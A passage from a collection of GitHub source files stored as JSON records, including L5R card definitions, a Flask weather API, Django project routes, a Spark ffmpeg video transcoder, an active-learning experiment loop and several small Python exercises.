Battle: Give a target enemy Personality -2F. If he is Scorpion Clan, give Kiyomako +1F.\"\nIkoma_Kiyomako = Personality(\n card_id=12305,\n title=\"Ikoma Kiyomako\",\n force=3,\n chi=2,\n personal_honor=2,\n gold_cost=5,\n honor_requirement=4,\n clan=[LionClan],\n keywords=[Resilient, Magistrate, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"Compassion: Equipping Nonhuman Followers to Hideyuki is a Battle/Open for you, for 1 less gold if Hideyuki entered play this battle. (Compassion takes effect while you have fewer Provinces than anyone else.)\"\nMatsu_Hideyuki = Personality(\n card_id=12306,\n title=\"Matsu Hideyuki\",\n force=2,\n chi=2,\n personal_honor=3,\n gold_cost=4,\n honor_requirement=0,\n clan=[LionClan],\n keywords=[Reserve, Beastmaster, Commander, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"You may destroy one of Kaori's unbowed Nonhuman Followers to refuse a challenge targeting her and negate all effects of refusing.
Earth Battle: Fear 2.\"\nMatsu_Kaori = Personality(\n card_id=12307,\n title=\"Matsu Kaori\",\n force=4,\n chi=2,\n personal_honor=2,\n gold_cost=7,\n honor_requirement=5,\n clan=[LionClan],\n keywords=[Beastmaster, Commander, Samurai, ScionOfStone],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n","repo_name":"aubustou/l5r","sub_path":"l5r_auto/cards/personalities/lion/thunderous_acclaim.py","file_name":"thunderous_acclaim.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36412828208","text":"import xlrd, xlwt\n\n\nclass DoExcel():\n def __init__(self, file_path, sheets):\n self.file_path = file_path\n self.sheets = sheets\n\n\n def write_excel(self):\n # res, fields = excute_sql()\n # 将结果写进excel\n workbook = xlwt.Workbook()\n # 新建sheet\n for sheet in self.sheets:\n workbook.add_sheet(sheet, cell_overwrite_ok=True)\n sh = workbook.get_sheet()\n # s = workbook.add_sheet(self.sheets[1], cell_overwrite_ok=True)\n\n # 将表的字段写入excel\n # for field in range(len(fields)):\n # workbook.get_sheet()\n # sheet.write(0, field, fields[field][0])\n # # 结果写入excel\n # for row in range(1, len(res)+1):\n # for col in range(len(fields)):\n # sheet.write(row, col, res[row-1][col])\n # excel保存为文件\n workbook.save(self.file_path)\n\n\nif __name__ == '__main__':\n file_path = r'F:\\py_project\\Sort\\select_M.xls'\n sheets = ['xx001', 'xx003']\n a = DoExcel(file_path, sheets)\n a.write_excel()\n\n print('ok01')\n","repo_name":"ltt-998/my_repository","sub_path":"Sort/do_excel.py","file_name":"do_excel.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32360942917","text":"#!/usr/bin/python\nimport psycopg2\nfrom config import config\n\n\"\"\"\nexecute the DELETE statement. If you want to pass values to the DELETE statement, you use the placeholders ( %s) in the DELETE statement and pass input values to the second parameter of the execute() method.\n\nThe DELETE statement with a placeholder for the value of the id field is as follows:\n\nDELETE FROM table_1 WHERE id = %s;\n\nTo bind value value_1 to the placeholder, you call the execute() method and pass the input value as a tuple to the second parameter like the following:\n\ncur.execute(delete_sql, (value_1,))\n\"\"\"\n\n \ndef delete_part(part_id):\n \"\"\" delete part by part id \"\"\"\n conn = None\n rows_deleted = 0\n try:\n # read database configuration\n params = config()\n # connect to the PostgreSQL database\n conn = psycopg2.connect(**params)\n # create a new cursor\n cur = conn.cursor()\n # execute the UPDATE statement\n cur.execute(\"DELETE FROM parts WHERE part_id = %s\", (part_id,))\n # get the number of updated rows\n rows_deleted = cur.rowcount\n # Commit the changes to the database\n conn.commit()\n # Close communication with the PostgreSQL database\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n \n return rows_deleted\n \n \n\nif __name__ == '__main__':\n deleted_rows = delete_part(2)\n print('The number of deleted rows: ', deleted_rows)\n\n\n\n\n","repo_name":"moghimis/python_postgres_tests","sub_path":"09_delete_data.py","file_name":"09_delete_data.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3234413844","text":"import numpy as np\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\n \r\n\r\n#Crear instancia\r\nwin=tk.Tk()\r\n\r\n\r\n#Agregar un titulo\r\nwin.title(\"CALCULADORA DE MATRICES\")\r\nwin.geometry(\"500x300\")\r\nwin.configure(background='dark turquoise')\r\n\r\nvar=tk.StringVar()\r\nvar1=tk.StringVar()\r\n\r\n\r\n\r\ntk.Label(win, text=\"Matriz 1\").grid(column=0, row=0)\r\n\r\nA_1_1=tk.Entry(win,width=5)\r\nA_1_1.grid(column=1, row=1)\r\n\r\nA_1_2=tk.Entry(win,width=5)\r\nA_1_2.grid(column=1, row=2)\r\n\r\nA_2_1=tk.Entry(win,width=5)\r\nA_2_1.grid(column=2, row=1)\r\n\r\nA_2_2=tk.Entry(win,width=5)\r\nA_2_2.grid(column=2, row=2)\r\n\r\ntk.Label(win, text=\"Matriz 2\").grid(column=3, row=0)\r\n\r\nB_1_1=tk.Entry(win,width=5)\r\nB_1_1.grid(column=4, row=1)\r\n\r\nB_1_2=tk.Entry(win,width=5)\r\nB_1_2.grid(column=4, row=2)\r\n\r\nB_2_1=tk.Entry(win,width=5)\r\nB_2_1.grid(column=5, row=1)\r\n\r\nB_2_2=tk.Entry(win,width=5)\r\nB_2_2.grid(column=5, row=2)\r\n\r\nenter=ttk.Button(win,text=\"+\", command=llenado_matrices)\r\nenter.grid(column=11, row=2)\r\n\r\nbotonresta=ttk.Button(win,text=\"-\", command=resta)\r\nbotonresta.grid(column=13, row=2)\r\n\r\nbotonmult=ttk.Button(win,text=\"*\", command=mult)\r\nbotonmult.grid(column=15, row=2)\r\n\r\nresultado=tk.Label(win, textvariable=var).grid(column=11, row=3)\r\nresultado=tk.Label(win, textvariable=var1).grid(column=11, row=5)\r\n\r\n\r\nwin.mainloop()\r\n","repo_name":"JoseRodolfo13210/CALCULADORAmatrices","sub_path":"borrador_matriz.py","file_name":"borrador_matriz.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34439761629","text":"from pathlib import Path\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import List\nfrom typing import Union\n\nimport numpy as np\nimport yaml\nfrom emukit.core import ParameterSpace\nfrom tqdm import tqdm\n\nfrom models import Model\n\n\ndef run_experiment(\n performance_function: Callable[[np.ndarray], np.ndarray],\n model: Model,\n parameter_space: ParameterSpace,\n save_dir: Path,\n cov_threshold: float = 0.1,\n misclassification_threshold: float = 0.02,\n n_mc: int = 5 * 10**3,\n n_doe: int = 12,\n max_iterations: int = 150,\n metric_fns: dict = None,\n true_pf: float = None,\n seed: int = None,\n) -> List[Dict[str, float]]:\n save_dir.mkdir(parents=True, exist_ok=True)\n if seed is not None:\n np.random.seed(seed)\n proposal_x = parameter_space.sample_uniform(n_mc)\n doe_idx = np.random.choice(n_mc, n_doe, replace=False)\n train_x = proposal_x[doe_idx, ...]\n proposal_x = np.delete(proposal_x, doe_idx, axis=0)\n\n metric_results: List[Dict[str, float]] = []\n\n for idx in tqdm(range(max_iterations)):\n model.train(train_x, performance_function(train_x))\n # Will repeatedly query the performance function - but this doesn't matter because only lightweight performance\n # functions are used for the experiments\n model.plot(save_dir / f\"model_idx={idx}\")\n if metric_fns is not None:\n metric_results.append({name: fn(model) for name, fn in metric_fns.items()})\n\n # compute max misclassification\n p_misclassification = model.misclassification_probability(proposal_x)\n max_misclassification = np.max(p_misclassification)\n metric_results[-1][\"Maximum predicted misclassification probability\"] = max_misclassification\n metric_results[-1][\"n training points\"] = len(train_x)\n\n all_x = np.concatenate([proposal_x, train_x])\n pf = model.failure_probability(all_x)\n sigma = np.sqrt(pf * (1 - pf) / len(all_x))\n if pf > 0:\n cov = sigma / pf\n else:\n cov = 1\n metric_results[-1][\"p_f\"] = pf\n if true_pf is not None:\n metric_results[-1][\"Failure Probability Absolute Error\"] = np.abs(pf - true_pf)\n metric_results[-1][\"CoV\"] = cov\n\n if max_misclassification < misclassification_threshold:\n if cov < cov_threshold:\n break\n else:\n new_samples = parameter_space.sample_uniform(n_mc)\n proposal_x = np.concatenate([proposal_x, new_samples])\n else:\n next_idx = np.argmax(p_misclassification)\n next_x = proposal_x[next_idx]\n proposal_x = np.delete(proposal_x, next_idx, axis=0)\n train_x = np.concatenate(\n [\n train_x,\n [\n next_x,\n ],\n ]\n )\n\n metric_results = prune_no_added_iterations(metric_results)\n\n with open(save_dir / \"results.yaml\", \"w\") as f:\n yaml.dump(convert_all_numpy_to_float(metric_results), f)\n\n return metric_results\n\n\ndef convert_all_numpy_to_float(to_convert: Any) -> Union[Dict, float, List]:\n \"\"\"Converts all types to yaml exportables by removing numpy arrays in a nested fashion\"\"\"\n if type(to_convert) == dict:\n return {key: convert_all_numpy_to_float(value) for key, value in to_convert.items()}\n elif type(to_convert) == list:\n return [convert_all_numpy_to_float(thing) for thing in to_convert]\n elif isinstance(to_convert, np.floating):\n return to_convert.item()\n elif isinstance(to_convert, np.int64):\n return to_convert.item()\n elif isinstance(to_convert, float):\n return to_convert\n elif isinstance(to_convert, int):\n return to_convert\n else:\n raise ValueError(f\"Can't convert to numpy: {to_convert} type {type(to_convert)}\")\n\n\ndef prune_no_added_iterations(metric_results: List[Dict[str, float]]) -> List[Dict[str, float]]:\n out_list = []\n for idx, item in enumerate(metric_results):\n if idx > 0 and item[\"n training points\"] == metric_results[idx - 1][\"n training points\"]:\n continue\n out_list.append(item)\n return out_list\n","repo_name":"fiveai/hGP_experiments","sub_path":"active_learning.py","file_name":"active_learning.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40801692172","text":"from die import Die\n\nclass Player(object):\n \n def __init__(self):\n #Has a pair of dice and an empty rolls list\n self._die1 = Die()\n self._die2 = Die()\n self._rolls = []\n \n def __str__(self):\n #Returns the string rep of the history of rolls\n result = \"\"\n for (v1, v2) in self._rolls:\n result = result + str((v1, v2)) + \" \" + str(v1 + v2) + '\\n'\n return result\n\n def getNumberOfRolls(self):\n #Returns the number of the rolls in one game\n return len(self._rolls)\n\n def play(self):\n #Plays a game, saves the rolls for that game, and returns True for a win and False for a loss\n self._rolls = []\n self._die1.roll()\n self._die2.roll()\n (v1, v2) = (self._die1.getValue(),\n self._die2.getValue())\n self._rolls.append((v1, v2))\n initialSum = v1 + v2\n if initialSum in (2, 3, 12):\n return False\n elif initialSum in (7, 11):\n return True\n while True:\n self._die1.roll()\n self._die2.roll()\n (v1, v2) = (self._die1.getValue(),\n self._die2.getValue())\n self._rolls.append((v1, v2))\n sum = v1 + v2\n if sum == 7:\n return False\n elif sum == initialSum:\n return True\n","repo_name":"ajheilman/A-game-of-craps","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31288009677","text":"# Dependencies\nfrom flask import Flask, jsonify\nimport numpy as np\nfrom numpy.testing._private.utils import measure\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nimport datetime as dt\n\n# Create engine\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# Reflect database\nbase = automap_base()\nbase.prepare(engine, reflect = True)\n\n# Save table references\nmeasurement = base.classes.measurement\nstation = base.classes.station\n\n# Create session\nsession = Session(engine)\n\n# Start Flask\napp = Flask(__name__)\n\n# Flask routes\n@app.route(\"/\")\ndef home():\n # Gives all routes\n return(f\"Welcome to the Surfs Up index!
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n\t\tf\"/api/v1.0/stations
\"\n\t\tf\"/api/v1.0/tobs
\"\n\t\tf\"/api/v1.0/()
\"\n\t\tf\"/api/v1.0(/)
\")\n # Convert the query results to a dictionary using date as the key and prcp as the value.\n # Return the JSON representation of your dictionary.\n\n # Create session\n # Store results\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n precip_results = session.query(measurement.date, measurement.tobs).order_by(measurement.date)\n\n # Store in dictionary\n date_precip = []\n for row in precip_results:\n dictionary = {}\n dictionary[\"date\"] = row.date\n dictionary[\"tobs\"] = row.tobs\n date_precip.append(dictionary)\n return jsonify(date_precip) \n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n # Return a JSON list of stations from the dataset.\n all_stations = session.query(station.station, station.name).all()\n\n station_list = list(all_stations)\n return jsonify(station_list)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Query the dates and temperature observations of the most active station for the last year of data.\n year_ago = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n tobs_query = session.query(measurement.date, measurement.tobs).filter(measurement.date >= year_ago).order_by(measurement.date).all()\n\n tobs_list = list(tobs_query)\n return jsonify(tobs_list)\n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n # When given the start only, calculate TMIN, TAVG, and TMAX for all dates greater than and equal to the start date.\n start_query = session.query(measurement.date, func.min(measurement.tobs), func.max(measurement.tobs), func.avg(measurement.tobs)).filter(measurement.date >= start).group_by(measurement.date).all()\n\n start_query_list = list(start_query)\n return jsonify(start_query_list)\n\n@app.route(\"/api/v1.0(/)\")\ndef start_end_date(start, end):\n # When given the start and the end date, calculate TMIN, TAVG, and TMAX for all dates greater than and equal to the start date.\n start_end_query = session.query(measurement.date, func.min(measurement.tobs), func.max(measurement.tobs), func.avg(measurement.tobs)).filter(measurement.date >= start).filter(measurement.date <= end).group_by(measurement.date).all()\n\n start_end_list = list(start_end_query)\n return jsonify(start_query_list)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"kyle125t/sqlalchemy-challenge","sub_path":"Instructions and Code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5300314952","text":"from django.urls import path\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom .views import *\r\n\r\nurlpatterns = [\r\n #---------------- Home -------------\r\n path(\"\", login_required(HomeView.as_view()), name=\"home\"),\r\n path(\"logout/\", signout, name=\"logout\"),\r\n #---------------- Resources -------------\r\n path('projects/resources/', login_required(ResourceListView.as_view()), name='resources-list'),\r\n path('projects/resources/create/', login_required(ResourceCreateView.as_view()), name='resources-create'),\r\n path('projects/resources//update/', login_required(ResourceUpdateView.as_view()), name='resources-update'),\r\n path('projects/resources//delete/', login_required(ResourceDeleteView.as_view()), name='resources-delete'),\r\n #---------------- Categories -------------\r\n path('projects/categories/', login_required(CategoryListView.as_view()), name='categories-list'),\r\n path('projects/categories/create/', login_required(CategoryCreateView.as_view()), name='categories-create'),\r\n path('projects/categories//update/', login_required(CategoryUpdateView.as_view()), name='categories-update'),\r\n path('projects/categories//delete/', login_required(CategoryDeleteView.as_view()), name='categories-delete'),\r\n #---------------- Announcements -------------\r\n path('projects/announcements/categories', login_required(AnnouncementCategoriesListView.as_view()), name='announcements-categories'),\r\n path('projects/announcements/select', login_required(AnnouncementListView.as_view()), name='announcements-list'),\r\n path('projects/announcements/create/', login_required(AnnouncementCreateView.as_view()), name='announcements-create'),\r\n path('projects/announcements//update/', login_required(AnnouncementUpdateView.as_view()), name='announcements-update'),\r\n path('projects/announcements//delete/', login_required(AnnouncementDeleteView.as_view()), name='announcements-delete'),\r\n path('projects/announcements//projects/', login_required(AnnouncementProjectListView.as_view()), name='announcementProjects-list'),\r\n path('projects/announcements//apply/', login_required(CreateAnnouncementProject.as_view()), name='announcementProjects-apply'),\r\n path('projects/announcements/select_project', login_required(ProjectSelectView.as_view()), name='select-project'),\r\n #---------------- Projects -------------\r\n path('projects/project/create/', login_required(ProjectCreateView.as_view()), name='project-create'),\r\n path('projects/project/list',login_required(ProjectListView.as_view()), name='projects_list'),\r\n path(\"projects/project/create//requirements\",login_required(Requirements2ProjectView.as_view()),name=\"project-create-requirements\"),\r\n path(\"projects/project/create///requirements/delete\",login_required(requitements_delete),name=\"project-delete-requirements\"),\r\n path(\"projects/project/create///requirements/edit\",login_required(RequirementsEditView.as_view()),name=\"project-edit-requirements\"),\r\n #---------------- Company -------------\r\n path('projects/company/create/',login_required(CompanyRegistration.as_view()),name = \"register_company\"),\r\n path('projects/company/detail/',login_required(CompanyDetail.as_view()),name = \"company_detail\"),\r\n path('projects/company//update/',login_required(EditCompany.as_view()),name = \"edit_company\"),\r\n path('projects/company//delete/',login_required(CompanyDeleteView.as_view()),name = \"delete_company\"),\r\n #---------------- User -------------\r\n path('projects/user/detail/',login_required(UserDetail.as_view()),name = \"user_detail\"),\r\n path('projects/user//update/',login_required(UserUpdateView.as_view()),name = \"user-update\"),\r\n #---------------- Donation --------------\r\n path('projects/donations//donations_list/', login_required(DonationListView.as_view()), name='donations-list'),\r\n path('projects/donations//create_donation/', login_required(DonationCreateView.as_view()), name='donation-create'),\r\n #---------------- Binnacle -------------\r\n path('projects/binnacle/create/', login_required(BinnacleCreateView.as_view()), name='binnacle-create'),\r\n path('projects/binnacle//update/', login_required(BinnacleUpdateView.as_view()), name='binnacle-update'),\r\n path('projects/binnacle//delete/', login_required(BinnacleDeleteView.as_view()), name='binnacle-delete'),\r\n #---------------- Report -------------\r\n path('projects//donations/report/', login_required(DonacionesProjectReport.as_view()), name='report-generate'),\r\n]\r\n\r\n\r\n","repo_name":"ICESI-PI1/Knowledge-Project-Gr5","sub_path":"src/knowledge_project/apps/app_projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"789566997","text":"import yaml\n\nfrom .config_registry import registry\n\n# Add the script configurations to the configuration registry.\n\n# CCCamera Housekeeping configs\nyaml_string = yaml.safe_load(\n \"\"\"\n component: \"CCCamera\"\n cmd: \"setFilter\"\n parameters:\n name: \"r_03\"\n timeout: 45\n \"\"\"\n)\n\nregistry[\"cccamera_set_filter\"] = yaml.safe_dump(\n yaml_string,\n explicit_start=True,\n canonical=True,\n)\n\n# MTMount Housekeeping configs\nyaml_string = yaml.safe_load(\n \"\"\"\n component: \"MTMount\"\n cmd: \"homeBothAxes\"\n \"\"\"\n)\n\nregistry[\"mtmount_home_both_axes\"] = yaml.safe_dump(\n yaml_string,\n explicit_start=True,\n canonical=True,\n)\n\n# MTPtg park\nyaml_string = yaml.safe_load(\n \"\"\"\n component: \"MTPtg\"\n cmd: azElTarget\n parameters:\n targetName: Park position\n azDegs: 0\n elDegs: 80\n rotPA: 0\n \"\"\"\n)\n\nregistry[\"mtptg_park\"] = yaml.safe_dump(\n yaml_string,\n explicit_start=True,\n canonical=True,\n)\n\n# MTPtg stop tracking\nyaml_string = yaml.safe_load(\n \"\"\"\n component: \"MTPtg\"\n cmd: stopTracking\n \"\"\"\n)\n\nregistry[\"mtptg_stop_tracking\"] = yaml.safe_dump(\n yaml_string,\n explicit_start=True,\n canonical=True,\n)\n","repo_name":"lsst-ts/ts_IntegrationTests","sub_path":"python/lsst/ts/IntegrationTests/configs/maintel_housekeeping_configs.py","file_name":"maintel_housekeeping_configs.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14657076609","text":"import itertools\r\n\r\nclass Link:\r\n\r\n newid = itertools.count()\r\n\r\n def __init__(self, transactions, quantity) -> None:\r\n\r\n self.id = next(Link.newid)\r\n self.transactions = sorted(transactions, key=lambda transaction: transaction.trans_type)\r\n self.quantity = quantity\r\n self.trans1 = self.transactions[0]\r\n self.trans2 = self.transactions[1]\r\n\r\n if self.trans1.unlinked_quantity < quantity or self.trans2.unlinked_quantity < quantity:\r\n raise ValueError(f\"Quantity of link [{quantity}] is greater than\\\r\n \\ntrans 1 Type [{self.trans1.trans_type}] [{self.trans1.symbol}] unlinked [{self.trans1.unlinked_quantity}]\\\r\n \\nor trans 2 Type [{self.trans2.trans_type}] [{self.trans2.symbol}] unlinked quantity [{self.trans2.unlinked_quantity}]\")\r\n\r\n if self.transactions[0].trans_type == 'buy' and self.transactions[1].trans_type == 'sell':\r\n self.buy = self.trans1\r\n self.sell = self.trans2\r\n \r\n elif self.transactions[0].trans_type == 'sell' and self.transactions[1].trans_type == 'buy':\r\n self.buy = self.trans2\r\n self.sell = self.trans1\r\n\r\n elif self.transactions[0].trans_type == 'receive' and self.transactions[1].trans_type == 'buy':\r\n self.buy = self.trans2\r\n self.receive = self.trans1\r\n\r\n elif self.transactions[0].trans_type == 'buy' and self.transactions[1].trans_type == 'receive':\r\n self.receive = self.trans2\r\n self.buy = self.trans1\r\n\r\n self.symbol = self.buy.symbol\r\n self.link_buy_price = (quantity * self.trans1.usd_spot)\r\n self.link_sell_price = (quantity * self.trans2.usd_spot)\r\n self.link_sell_date = self.trans2.time_stamp\r\n self.link_buy_date = self.trans1.time_stamp\r\n self.profit_loss = (self.link_sell_price - self.link_buy_price)\r\n\r\n\r\n def __hash__(self) -> int:\r\n return hash(tuple(self.transactions))\r\n\r\n def __str__(self) -> str:\r\n return f\"Name: [{self.transactions[0].name}] Trans Type [{self.transactions[0].trans_type}] Quantity [{self.transactions[0].quantity:.2f}]\\\r\n <-{self.quantity:.2f}-> \\\r\n Name: [{self.transactions[1].name}] Trans Type [{self.transactions[1].trans_type}] Quantity [{self.transactions[1].quantity:.2f}]\"\r\n\r\n def __repr__(self):\r\n return f\"Link ID: {self.id} Link Quantity: {self.quantity} Link Type: {self.symbol}\"\r\n\r\n\r\n @property\r\n def hodl_duration(self):\r\n hodl_time = self.sell.time_stamp - self.buy.time_stamp\r\n\r\n return hodl_time\r\n\r\n @property\r\n def proceeds(self):\r\n return self.quantity * self.sell.usd_spot\r\n\r\n @property\r\n def cost_basis(self):\r\n return self.quantity * self.buy.usd_spot\r\n\r\n def other_transaction(self, trans):\r\n if trans == self.trans1:\r\n return self.trans2.name\r\n else:\r\n return self.trans1.name\r\n\r\n\r\nif __name__ == '__main__':\r\n test_link = Link()","repo_name":"salexandert/Gainz","sub_path":"link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9941864287","text":"from django.contrib import admin\nfrom .models import PersonSet, Person, Settings\n\n\nclass PersonInline(admin.StackedInline):\n model = Person\n\n\nclass PersonSetAdmin(admin.ModelAdmin):\n model = PersonSet\n inlines = [PersonInline]\n\n\nadmin.site.register(PersonSet, PersonSetAdmin)\nadmin.site.register(Settings)\n","repo_name":"arnodeceuninck/GuessWho","sub_path":"guesswho/guesswho/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37743947712","text":"import pygame;\nfrom pygame.sprite import Sprite;\n\nclass Bullet(Sprite):\n\tdef __init__(self,screen,turret,tick):\n\t\tsuper(Bullet, self).__init__();\n\t\tself.screen = screen;\n\t\tself.screen_rect = self.screen.get_rect();\n\t\tself.image = pygame.image.load('./images/bullet.png');\n\t\tself.image = pygame.transform.scale(self.image, (30,30));\n\t\tself.rect = self.image.get_rect();\n\t\tself.rect.centerx = turret.rect.centerx;\n\t\tself.rect.top = turret.rect.top + 50;\n\t\tself.turret = turret\n\t\tself.tick = tick;\n\t\tself.name = ''\n\n\t\tself.factory_row = turret.factory_row;\n\n\t\tself.x = self.rect.x+25;\n\t\tself.y = self.rect.y;\n\t\t\n\t\t#set a bullet type to each turret\n\t\tif turret.name=='gatling':\n\t\t\tself.image = pygame.image.load('./images/bullet.png');\n\t\t\tself.image = pygame.transform.scale(self.image, (30,30));\n\t\t\tself.rect.top = turret.rect.top + 40;\n\t\telif turret.name=='double':\n\t\t\tself.image = pygame.image.load('./images/double_bullet.png');\n\t\t\tself.image = pygame.transform.scale(self.image, (40,30));\n\t\t\tself.rect.top = turret.rect.top + 40;\t\t\n\t\telif turret.name=='toxic':\n\t\t\tself.image = pygame.image.load('./images/toxic_bullet.png');\n\t\t\tself.image = pygame.transform.scale(self.image, (30,30));\n\t\t\tself.name='super_bullet'\n\t\t\t\n\t#draws bullet\n\tdef draw_me(self):\n\t\tself.screen.blit(self.image,self.rect);\n\n\t#updates the bullet's positions\n\tdef update_me(self):\n\t\tself.x += 20 * 2;\n\t\tself.rect.x = self.x;\n\t\t\n\t\t#give the toxic turret its bullet spray ability\n\t\tif self.turret.name =='toxic':\n\t\t\tif self.tick % 3 ==1:\n\t\t\t\tself.rect.y += 5\n\t\t\telif self.tick % 3 ==2:\n\t\t\t\tself.rect.y -= 5\n\t\t\t# elif self.tick % 3 ==0:\t","repo_name":"CayaKnight/PythonProject","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70707992109","text":"'''\r\nCreated on Jan 10, 2016\r\n\r\n@author: SG0946321\r\n'''\r\nfrom com.sabre.api.sacs.workflow.SharedContext import SharedContext\r\n\r\nclass Workflow:\r\n \r\n def __init__(self, startActivity):\r\n self.startActivity = startActivity\r\n \r\n def runWorkflow(self):\r\n nextActivity = self.startActivity\r\n sharedContext = SharedContext()\r\n while nextActivity is not None:\r\n nextActivity = nextActivity.runActivity(sharedContext)\r\n \r\n return sharedContext","repo_name":"kl26/namei_group_sabre","sub_path":"SACS-Python-master/com/sabre/api/sacs/workflow/Workflow.py","file_name":"Workflow.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26639140914","text":"import numpy as np\nimport time\n\na=np.array([1,2,3,4])\nprint(a)\n\n\na=np.random.rand(10000000)\nprint(a.shape)\nb=np.random.rand(10000000)\ntic=time.time()\nc=np.dot(a,b)\ntoc=time.time()\nprint(c)\nprint(\"vectorized version: \"+str(1000*(toc-tic))+\"ms\")\n\nc=0\ntic=time.time()\nfor i in range(10000000):\n c+=a[i]*b[i]\ntoc=time.time()\nprint(c)\nprint(\"For loop: \"+str(1000*(toc-tic))+\"ms\")","repo_name":"HelloMX/deepLearning","sub_path":"deeplearning.ai/related_notes/course1/note1_vectorization1.py","file_name":"note1_vectorization1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"21007526226","text":"import os\nimport subprocess\nfrom pyspark import SparkContext, SparkConf\n\ndef transcode_segment(args):\n input_file, start_time, segment_length, output_segment = args\n subprocess.run([\n \"ffmpeg\", \"-y\", \"-ss\", str(start_time), \"-t\", str(segment_length),\n \"-i\", input_file, \"-c:v\", \"libx265\", \"-c:a\", \"aac\", output_segment\n ], check=True)\n return output_segment\n\ninput_file = \"input_video.avi\"\noutput_file = \"output_video.mp4\"\nsegment_length = 10\nvideo_length = 2 * 60\nnum_segments = video_length // segment_length\n\n# Initialize Spark\nconf = SparkConf().setAppName(\"VideoProcessing\")\nsc = SparkContext(conf=conf)\n\n# Prepare the input data\ninput_data = [\n (input_file, i * segment_length, segment_length, f\"segment_{i:03d}.mp4\")\n for i in range(num_segments)\n]\n\n# Distribute the data and process it using Spark\nrdd = sc.parallelize(input_data)\nrdd.map(transcode_segment).collect()\n\n# Create a file with a list of segments\nwith open(\"segments_list.txt\", \"w\") as f:\n for i in range(num_segments):\n f.write(f\"file 'segment_{i:03d}.mp4'\\n\")\n\n# Concatenate the segments to create the final video\nsubprocess.run([\n \"ffmpeg\", \"-y\", \"-f\", \"concat\", \"-safe\", \"0\", \"-i\", \"segments_list.txt\",\n \"-c\", \"copy\", output_file\n], check=True)\n\n# Clean up temporary files\nfor i in range(num_segments):\n os.remove(f\"segment_{i:03d}.mp4\")\nos.remove(\"segments_list.txt\")\n","repo_name":"alexc-hollywood/video-segment-processing","sub_path":"python/spark/hevc_encoder.py","file_name":"hevc_encoder.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4188199166","text":"import pandas as pd\nimport numpy as np\nfrom typing import Tuple\n\n\nclass SplitDataFrame():\n \"\"\"\n Careful here, self.__data is stored as the transpose\n of the original data to ease computation.\n \"\"\"\n\n def __init__(self, data: pd.DataFrame, na_prop: int = 0.05):\n # Drop all the columns full of NAs. We do that because some\n # time series do not start on the same day so we do not want\n # to have columns full of NAs.\n # data = data.dropna(how='all', axis=1)\n self.data = data\n self.na_prop = na_prop\n self.__data['nb_na'] = self.__data.apply(SplitDataFrame.number_of_na_in_ts, axis=0)\n self.data = self.__data.sort_values(by=['nb_na']).drop(columns=['nb_na'])\n self.train, self.valid, self.extra_na_data = self.__split_train_valid()\n\n @property\n def data(self) -> pd.DataFrame:\n return self.__data.T\n\n @data.setter\n def data(self, value):\n self.__data = value\n\n def __split_train_valid(self, train_proportion: int = 0.8) -> Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Returns a tuple in the form of :\n (\n {\n 'orignal': train data\n 'new': train data with new missing values\n 